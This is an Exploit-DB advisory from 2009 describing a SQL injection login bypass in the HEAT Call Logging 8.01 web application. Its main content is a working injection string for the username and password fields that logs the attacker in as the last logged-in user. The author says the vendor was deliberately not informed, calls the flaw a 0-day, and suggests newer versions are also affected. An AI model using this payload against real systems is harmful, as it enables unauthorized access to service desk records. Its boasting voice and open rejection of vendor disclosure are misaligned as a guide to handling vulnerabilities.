HEAT Call Logging 8.01 - SQL Injection

EDB-ID:

9809

Author:

0 0

Type:

webapps

Platform:

ASP

Published:

2009-09-28

[=[ ;otokoyama; ]=]


-=[HEAT Call Logging Version 8.01]=-
"The HEAT family is a comprehensive service solution,
combining core technologies with a variety of expansion options,
so any enterprise can build a tailored solution."

-=[web]=-
http://www.frontrange.com/heat.aspx

-=[attack]=-
U:' OR HEATPass IS NOT NULL OR HEATPass = '
P:' OR HEATPass IS NOT NULL OR HEATPass = '

-=[Effect]=-
Logs in as last logged in user.
There would be many variations of the above, but who can be bothered.

-=[NOTICE]=-
Due to vendor and product distaste I have not informed them of this vuln.

I guess this is a 0-day then..

Via their webpage current version appears to be 9.0,
could apply to this version aswell

SHOUTS:4chan for being shit, yes I will troll in a POC.


antilimit owns you